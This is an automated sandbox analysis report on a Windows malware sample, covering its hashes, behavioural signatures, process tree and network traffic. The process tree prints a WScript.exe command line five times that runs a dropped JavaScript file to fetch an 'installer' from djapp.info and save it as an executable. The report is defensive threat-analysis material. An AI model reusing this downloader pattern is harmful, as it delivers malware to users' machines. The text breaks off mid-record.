Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    134s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/05/2024, 09:51 UTC

General

  • Target

    8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    8695849edc287a9761aea3bab6a6feb1

  • SHA1

    83bab866fb8ad5bc85e3024133799ff6d45add46

  • SHA256

    91a34986c15dc37ac33b15e677f21940d992cf2c31b5af85d9ead18b251ef8a0

  • SHA512

    ddb6ccf813f7d7a7f888417569c3fe5e4953ba832b1581231c5016062859292fe4d7c3faf9d98dd0c8987fe2c43c45501c7740ff80404b21d4286cafe30479b2

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3r:/7BSH8zUB+nGESaaRvoB7FJNndnO

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:1588
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:4576
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:3532
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:3152
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:4840

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-2.hugedomains.com
    traff-2.hugedomains.com
    IN CNAME
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.253.23
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.204.160
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 31 May 2024 09:51:14 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.hugedomains.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hugedomains.com
    IN A
    Response
    www.hugedomains.com
    IN A
    172.67.70.191
    www.hugedomains.com
    IN A
    104.26.7.37
    www.hugedomains.com
    IN A
    104.26.6.37
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    23.253.130.3.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.253.130.3.in-addr.arpa
    IN PTR
    Response
    23.253.130.3.in-addr.arpa
    IN PTR
    ec2-3-130-253-23 us-east-2compute amazonawscom
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
  • flag-us
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; domain=.bing.com; expires=Wed, 25-Jun-2025 09:51:15 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 89EF9A2B745D40058026FF2F5CFC4C20 Ref B: LON04EDGE0908 Ref C: 2024-05-31T09:51:15Z
    date: Fri, 31 May 2024 09:51:15 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=DUezu6s2NXx1lXARAQZNY5x5o_X8JvkZfLImOc9eWgY; domain=.bing.com; expires=Wed, 25-Jun-2025 09:51:16 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E35DA7C48B504048A81B0152C3CCDAD0 Ref B: LON04EDGE0908 Ref C: 2024-05-31T09:51:16Z
    date: Fri, 31 May 2024 09:51:16 GMT
  • flag-be
    GET
    https://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981
    Remote address:
    88.221.83.184:443
    Request
    GET /aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981 HTTP/2.0
    host: www.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1B834AF31E2D69D531A45E631F9668C3
    Response
    HTTP/2.0 200
    cache-control: private,no-store
    pragma: no-cache
    vary: Origin
    p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: A1BA0E349F0B455A9638F92E21D83B4C Ref B: DUS30EDGE0417 Ref C: 2024-05-31T09:51:16Z
    content-length: 0
    date: Fri, 31 May 2024 09:51:16 GMT
    set-cookie: _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E; path=/; httponly; domain=bing.com
    set-cookie: MUIDB=1B834AF31E2D69D531A45E631F9668C3; path=/; httponly; expires=Wed, 25-Jun-2025 09:51:16 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.b453dd58.1717149076.7ce5e78
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    72.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    72.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-be
    GET
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    88.221.83.184:443
    Request
    GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E; MSPTC=DUezu6s2NXx1lXARAQZNY5x5o_X8JvkZfLImOc9eWgY; MUIDB=1B834AF31E2D69D531A45E631F9668C3
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QWthbWFp
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 1107
    date: Fri, 31 May 2024 09:51:17 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.b453dd58.1717149077.7ce6296
  • flag-us
    DNS
    237.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.197.79.204.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    184.83.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    184.83.221.88.in-addr.arpa
    IN PTR
    Response
    184.83.221.88.in-addr.arpa
    IN PTR
    a88-221-83-184deploystaticakamaitechnologiescom
  • flag-us
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 31 May 2024 09:51:28 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 31 May 2024 09:51:39 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    86.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 31 May 2024 09:51:51 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 31 May 2024 09:52:04 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    240.197.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.197.17.2.in-addr.arpa
    IN PTR
    Response
    240.197.17.2.in-addr.arpa
    IN PTR
    a2-17-197-240deploystaticakamaitechnologiescom
  • flag-us
    DNS
    249.197.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    249.197.17.2.in-addr.arpa
    IN PTR
    Response
    249.197.17.2.in-addr.arpa
    IN PTR
    a2-17-197-249deploystaticakamaitechnologiescom
  • flag-us
    DNS
    29.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    29.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 415458
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 0F978301DD44494B80D2BA70EBAC885B Ref B: LON04EDGE0706 Ref C: 2024-05-31T09:52:55Z
    date: Fri, 31 May 2024 09:52:55 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 430689
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E597BFFB31274B2B8745657D15644889 Ref B: LON04EDGE0706 Ref C: 2024-05-31T09:52:55Z
    date: Fri, 31 May 2024 09:52:55 GMT
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001a-msedgenet
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
    283 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 204.79.197.237:443
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB
    tls, http2
    2.5kB
    9.0kB
    20
    17

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

    HTTP Response

    204

    HTTP Request

